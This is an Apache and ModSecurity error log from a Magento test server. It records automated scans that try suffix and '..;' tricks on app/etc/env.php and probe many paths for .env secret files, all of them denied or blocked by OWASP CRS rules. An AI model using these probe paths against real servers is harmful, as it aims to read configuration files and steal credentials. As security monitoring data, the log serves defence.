[Sat Feb 22 20:30:01.272904 2025] [authz_core:error] [pid 1324770] [client 185.246.189.156:39200] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php+, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:01.499308 2025] [authz_core:error] [pid 1324875] [client 185.246.189.156:39224] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php\xe2\x84\x96, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:01.712903 2025] [authz_core:error] [pid 1324879] [client 185.246.189.156:39212] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php=, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:02.111249 2025] [authz_core:error] [pid 1324801] [client 185.246.189.156:39198] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php|, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:02.308989 2025] [authz_core:error] [pid 1324877] [client 185.246.189.156:39210] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php-, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:02.326182 2025] [authz_core:error] [pid 1324878] [client 185.246.189.156:39184] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:02.474083 2025] [authz_core:error] [pid 1324874] [client 185.246.189.156:39228] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php>, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:05.487847 2025] [authz_core:error] [pid 1324872] [client 185.246.189.156:39246] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.131177 2025] [authz_core:error] [pid 1324873] [client 185.246.189.156:39234] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php<, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.136448 2025] [authz_core:error] [pid 1324876] [client 185.246.189.156:39296] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php,, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.354313 2025] [authz_core:error] [pid 1324875] [client 185.246.189.156:39266] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.419833 2025] [authz_core:error] [pid 1324801] [client 185.246.189.156:39294] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php., referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.420013 2025] [authz_core:error] [pid 1324877] [client 185.246.189.156:39236] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php., referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.432126 2025] [authz_core:error] [pid 1324879] [client 185.246.189.156:39260] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.615159 2025] [authz_core:error] [pid 1324874] [client 185.246.189.156:39306] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php', referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.627855 2025] [authz_core:error] [pid 1324878] [client 185.246.189.156:39320] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php., referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.756063 2025] [authz_core:error] [pid 1324872] [client 185.246.189.156:39322] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php\t, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.784712 2025] [authz_core:error] [pid 1324876] [client 185.246.189.156:39348] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:06.795708 2025] [authz_core:error] [pid 1324873] [client 185.246.189.156:39338] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php , referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:37.518740 2025] [authz_core:error] [pid 1324801] [client 185.246.189.156:33070] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:37.794168 2025] [authz_core:error] [pid 1324879] [client 185.246.189.156:33084] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc..;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:37.801945 2025] [authz_core:error] [pid 1324877] [client 185.246.189.156:33040] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:38.073086 2025] [authz_core:error] [pid 1324874] [client 185.246.189.156:33094] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/..;env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:38.119070 2025] [authz_core:error] [pid 1324876] [client 185.246.189.156:33026] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:38.319206 2025] [authz_core:error] [pid 1324878] [client 185.246.189.156:32998] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php..;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:38.322296 2025] [authz_core:error] [pid 1324873] [client 185.246.189.156:33012] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php..;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:38.348746 2025] [authz_core:error] [pid 1324872] [client 185.246.189.156:33008] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php, referer: https://economiasolidale.38121.it/
[Sat Feb 22 20:30:38.414001 2025] [authz_core:error] [pid 1324770] [client 185.246.189.156:33054] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/env.php;, referer: https://economiasolidale.38121.it/
[Sat Feb 22 23:01:37.071181 2025] [:error] [pid 1324879] [client 45.148.10.166:42730] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7pJQXzwg1sUFvYIvKHPSAAAAFI"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.072239 2025] [:error] [pid 1324879] [client 45.148.10.166:42730] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7pJQXzwg1sUFvYIvKHPSAAAAFI"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.072579 2025] [:error] [pid 1324879] [client 45.148.10.166:42730] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z7pJQXzwg1sUFvYIvKHPSAAAAFI"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.208445 2025] [:error] [pid 1324874] [client 45.148.10.166:42732] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7pJQftky72f57E6I5D1ggAAAE0"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.209553 2025] [:error] [pid 1324874] [client 45.148.10.166:42732] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7pJQftky72f57E6I5D1ggAAAE0"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.210025 2025] [:error] [pid 1324874] [client 45.148.10.166:42732] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "Z7pJQftky72f57E6I5D1ggAAAE0"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.868758 2025] [:error] [pid 1324872] [client 45.148.10.166:42750] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7pJQfb1EHGQ3bZwEhJW9AAAAEs"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.869812 2025] [:error] [pid 1324872] [client 45.148.10.166:42750] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7pJQfb1EHGQ3bZwEhJW9AAAAEs"], referer: https://www.google.com/
[Sat Feb 22 23:01:37.870305 2025] [:error] [pid 1324872] [client 45.148.10.166:42750] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "Z7pJQfb1EHGQ3bZwEhJW9AAAAEs"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.061164 2025] [:error] [pid 1324770] [client 45.148.10.166:42756] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7pJQk10iGF_xgbBjepwDQAAAAI"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.062128 2025] [:error] [pid 1324770] [client 45.148.10.166:42756] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7pJQk10iGF_xgbBjepwDQAAAAI"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.062660 2025] [:error] [pid 1324770] [client 45.148.10.166:42756] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "Z7pJQk10iGF_xgbBjepwDQAAAAI"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.231700 2025] [:error] [pid 1324876] [client 45.148.10.166:42766] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /login/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7pJQi0lx6EHu5d66nqpgQAAAE8"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.232679 2025] [:error] [pid 1324876] [client 45.148.10.166:42766] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7pJQi0lx6EHu5d66nqpgQAAAE8"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.233123 2025] [:error] [pid 1324876] [client 45.148.10.166:42766] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/login/.env"] [unique_id "Z7pJQi0lx6EHu5d66nqpgQAAAE8"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.373519 2025] [:error] [pid 1339753] [client 45.148.10.166:42780] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7pJQnV5rzFZdkqLv-bEggAAAAQ"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.374586 2025] [:error] [pid 1339753] [client 45.148.10.166:42780] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7pJQnV5rzFZdkqLv-bEggAAAAQ"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.375057 2025] [:error] [pid 1339753] [client 45.148.10.166:42780] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "Z7pJQnV5rzFZdkqLv-bEggAAAAQ"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.534562 2025] [:error] [pid 1324878] [client 45.148.10.166:42796] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7pJQpCEpSQB_HZ02bvHVwAAAFE"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.535554 2025] [:error] [pid 1324878] [client 45.148.10.166:42796] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7pJQpCEpSQB_HZ02bvHVwAAAFE"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.536022 2025] [:error] [pid 1324878] [client 45.148.10.166:42796] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "Z7pJQpCEpSQB_HZ02bvHVwAAAFE"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.707512 2025] [authz_core:error] [pid 1324873] [client 45.148.10.166:42798] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env, referer: https://www.google.com/
[Sat Feb 22 23:01:38.865859 2025] [:error] [pid 1324879] [client 45.148.10.166:42806] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7pJQnzwg1sUFvYIvKHPSQAAAFI"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.866887 2025] [:error] [pid 1324879] [client 45.148.10.166:42806] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7pJQnzwg1sUFvYIvKHPSQAAAFI"], referer: https://www.google.com/
[Sat Feb 22 23:01:38.867372 2025] [:error] [pid 1324879] [client 45.148.10.166:42806] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "Z7pJQnzwg1sUFvYIvKHPSQAAAFI"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.501679 2025] [:error] [pid 1324801] [client 45.148.10.166:42848] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7pJQ0IDaHMGZ72cYjod_gAAAAY"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.502507 2025] [:error] [pid 1324801] [client 45.148.10.166:42848] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7pJQ0IDaHMGZ72cYjod_gAAAAY"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.503019 2025] [:error] [pid 1324801] [client 45.148.10.166:42848] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "Z7pJQ0IDaHMGZ72cYjod_gAAAAY"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.662680 2025] [:error] [pid 1324872] [client 45.148.10.166:42854] [client 45.148.10.166] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7pJQ_b1EHGQ3bZwEhJW9QAAAEs"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.663738 2025] [:error] [pid 1324872] [client 45.148.10.166:42854] [client 45.148.10.166] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7pJQ_b1EHGQ3bZwEhJW9QAAAEs"], referer: https://www.google.com/
[Sat Feb 22 23:01:39.664204 2025] [:error] [pid 1324872] [client 45.148.10.166:42854] [client 45.148.10.166] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "Z7pJQ_b1EHGQ3bZwEhJW9QAAAEs"], referer: https://www.google.com/
